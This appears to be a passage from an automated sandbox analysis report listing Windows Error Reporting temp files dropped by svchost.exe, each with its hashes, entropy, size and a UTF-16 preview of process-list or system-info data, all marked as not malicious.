SHA1:	B2022A425816E082D4A47EE351C31E28DA57D969
SHA-256:	14F7F8693C7F77C7F5106AD150946EECAE1177ECB6C76629E94BCB7EF8E578A8
SHA-512:	250C283F11B7C5CDEA2413BE3B90758B4493B453CC03D7921D511E37ED5B0C75EBE7360E90C2362DF74DD750D943CC860050E0BB54D50AF180A3270B477FB00A
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="254838" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCCBD.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	95834
Entropy (8bit):	3.070424023296697
Encrypted:	false
SSDEEP:	1536:LPNtQvBSF1M9Hvl18SZh74O7dmAa2Vnco4bn6:LPNtQvBSF1M9Hvl18SZh74O7dm32Vnce
MD5:	028B4BF7B95464A2A181293998DAE274
SHA1:	5050278EA12CCC35E008AD68C6115640AEB8C14D
SHA-256:	9422B0D3318429DFD7240167960DB22A47A31A050B0AB7843CA6A3ADAD5AB391
SHA-512:	D5B2BA16110C0EA1FD1324CF46B38AD9502517C59EBEFBAAB9A28D024DE017A7500846B62F60A859E12A98703BCE62DA65AD65394F7AA49EC8FCC2B422C39403
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCD3B.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	95854
Entropy (8bit):	3.0705813465300107
Encrypted:	false
SSDEEP:	1536:yPG5BuX1M9HJl48SVh74O7dmAaXlni1bn6:yPG5BuX1M9HJl48SVh74O7dm3Xlni1b6
MD5:	005D2A94A334D22AA6473A8F37F8077D
SHA1:	A8B173B1375639376F5D30A155F7F85017F57BD6
SHA-256:	C50FC79E127FC4CD7B289DE5A2DF5C074DE8285F3438323BBB6900FF7FBEA9EE
SHA-512:	66C69993FD3FA43A5951D2C8AE49FE86F61B35E44E2A3ED1B68B45126E678C4DB94A0D20FA83F6051B2044E16D8BA73E1DCEC59175E54D179F13D13FD4C9F481
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCD6B.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	95850
Entropy (8bit):	3.070361709766848
Encrypted:	false
SSDEEP:	1536:3PNtMBZ7+1M9HSl18SZh74O7dmAa7aTntfbn6:3PNtMBZ7+1M9HSl18SZh74O7dm37aTng
MD5:	A496A46A7C25366E44CB26FC84AF98CB
SHA1:	D83B23FF6646DB2B560CA6F8FD66DF9CF9448111
SHA-256:	103D595C4C7FFC9E26E75F8A4F6BEE1114D2E010143FC8246180962D55BB5E5E
SHA-512:	C923483E61511EDB48F1901E53397B7F958FDCC552EDE2F9E1B0538ECCC405025AC9CA5FB854E146A4A30F011807B6A781BA0DDC16DBBAC13C26C7EA9CA3E07A
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD099.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6854894902451423
Encrypted:	false
SSDEEP:	96:TiZYWJOC0iZ5yYcYPWWNHZ1YEZbKtAi94oPVIwZPYJaodQMU6/IMd3:2ZDJGryr2PkaodQMU6QMd3
MD5:	E91B66867A9817EDEEACE5B8B3B0FD45
SHA1:	44DCB70EB56BC42DDB493AB04CD6FF64EBF0B2C1
SHA-256:	B8DADBA90DEAC16E0426032705BA7649A490E66456ED2B36F729CC5C8A9EC301
SHA-512:	0900F7B9905C04361E6C825DF9B48D2298151645F66CD791C3344264457B951D1673492CDF1997364FBB9739384A649E2422A4D6665502ADA762F5538E2504E7
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD0F7.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.68525730534521
Encrypted:	false
SSDEEP:	96:TiZYWxrNW/ZlY1YEWRfHZNYEZScmtAir4oPV4wS+da0dLMT6jIUd3:2ZDcSyqcya0dLMT6sUd3
MD5:	450BE0161E32AAF891308733DDCF3C43
SHA1:	44C047CA321D60B338A366D23D387EC45CD18BC0
SHA-256:	A844A7F669F7A8F17741C29266BCA303F39F55FDCA53EAC29DAA356481AE3EDE
SHA-512:	C810F96164CAF542DACC0128E5712281A80DEFC10ED3D76F6ED79B72A85B8FD6C8DE27A06C241F322B21D5E8FCC434065498121C27AA7020CF0AB7599A239240
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD127.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.685559513239547
Encrypted:	false
SSDEEP:	96:TiZYWir0fZLY+ZYmWJHZNYEZlAtAi74oPV4wpFfaodIMc6IIGd3:2ZDvHZAd+FaodIMc6vGd3
MD5:	7FE4AA923E18552FC52E43E756BF358A
SHA1:	3362A521FE8AB2A6108DF9083BA7200B24E30CB1
SHA-256:	499ADDD33FA3540F191A1E85BF8C4AF4350AF0561147A64ECAF2EADCC14671C0
SHA-512:	9F37C57794A48B61FE71E482DF03CB0C408D6E408AE0E6FAD8AE76999953CE9511CBC62FE8DD78F6F6D25A1726B0C64092AE1D830058116733F185FD5771FBC8
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDC65.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	90966
Entropy (8bit):	3.0611641310371582
Encrypted:	false
SSDEEP:	1536:S8Tcy4vZnZGb5E5yhdZgB8RoaEMTBamLg1L7St:S8Tcy4vZnZGb5E5yhdZgB8RoaEKBamLF
MD5:	324540CCAA91E15D4C3609CE9103BBE9
SHA1:	C5A2B25F6D7E0280AD4240541E38E53267B613D3
SHA-256:	D05BC63E13C0D9A7ED5E969D6FE7624A28DC7B808F6FFF1540C394324AAC57F4
SHA-512:	39C5318AD7611A517B8DC71372D66A0B8565FAAD99E2A5092B3DC633104FADE010009B6961F854AA13A4B19BC6B599A648BEFCCA3DE973E822F70770286E11B0
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDCC4.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6973665460501954
Encrypted:	false
SSDEEP:	96:TiZYWY35wmYsYm6WD4HfYEZZbtAiG4IPVpwgmlnD8aofao2M2eNIk10:2ZD6bMG6D8aoiZM2eSk10
MD5:	070F38690191CE59CFA25A71C131DDC9
SHA1:	86ED16E520117697FD0E9FA205350BE4D027250E
SHA-256:	2FFE6AF1EB2F940F9ECCF2B3A2AE1467437CDA8BFC13AEE26EA80DCE16764A96
SHA-512:	AE7EAF6ED6614A08C1AB73927A5E397C540DC6C20D54FF8473962E2DF677439EBB364EAF179517F866668E5F03957BEE2E4DEF0DCBD8400B507F1F1291511EA5
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE456.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	90960
Entropy (8bit):	3.060890602015194
Encrypted:	false
SSDEEP:	1536:Wv8vKy5vZUYsbSVshY2+dbDaILMTBamLe1ShWRh:Wv8vKy5vZUYsbSVshY2+dbDaILKBamLU
MD5:	A64F5E30A06C2022BC59363C81217205
SHA1:	63C5ADD3D5AD6FD66462CDF48B0648A17D9C7165
SHA-256:	2123822B18F37862244681BF5AE17D58A5B852D64FB65D14B15BECDDD89A99A5
SHA-512:	7E0B7D0FE1D0E29D7515D4EE0EA7BFB024A45C6A5C19673F10529D9ACB1746D3D4E0F7A1AFC01D97A107928FE2406515699367B71B08C45F6CA97273F42D236A
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE4A5.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6969264277602902
Encrypted:	false
SSDEEP:	96:TiZYWzXsl0SYUYoWKTWHTYEZwTtDiy40PVBwWs2QVa1fagMTedIE10:2ZDzijTZeVa1igMTeiE10
MD5:	50B5834CAD203B6113EF8611BBDF318A
SHA1:	9C951C0FE4AF4E268E6F78F6DEB8F854EF8B2651
SHA-256:	18EA0C922A8FAEA07A7D8C5BA4A2198B00665D5A1B1EF0657BC7D809357B2709
SHA-512:	14DA6D8D01206952349CE6D1F71585A36DFA5AECA079355D439231E10B1337D1954316CDFF12CFF32D9B5027EC9A432F61DD1974EA1F4CD78EFF8EDC9880BAC9
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREFB2.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	90988
Entropy (8bit):	3.060806228753166
Encrypted:	false
SSDEEP:	1536:idnyhdvZzsKXbA2zhHeRH48qziMTBamL612LvWRC:idnyhdvZzsKXbA2zhHeRH48qziKBamLh
MD5:	C6A2E94304E4FF8CBC582C39D08D082A
SHA1:	0B8CD7C7CC60E26B85624874EBC901768A02753F
SHA-256:	8D5E76E709472E7807D199F6314BFEBD5EFFE4BFE32213384B8962B6BEDCBEBD
SHA-512:	5DF71F6B2B94A68A73A0E94699AA3C9704E2C308E9492639CA30AF6AA2C0CC07F3610CF7E865AD02347E4BAC1229E808CEADE9DE9746D99FE5C1A9650233ABD8
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.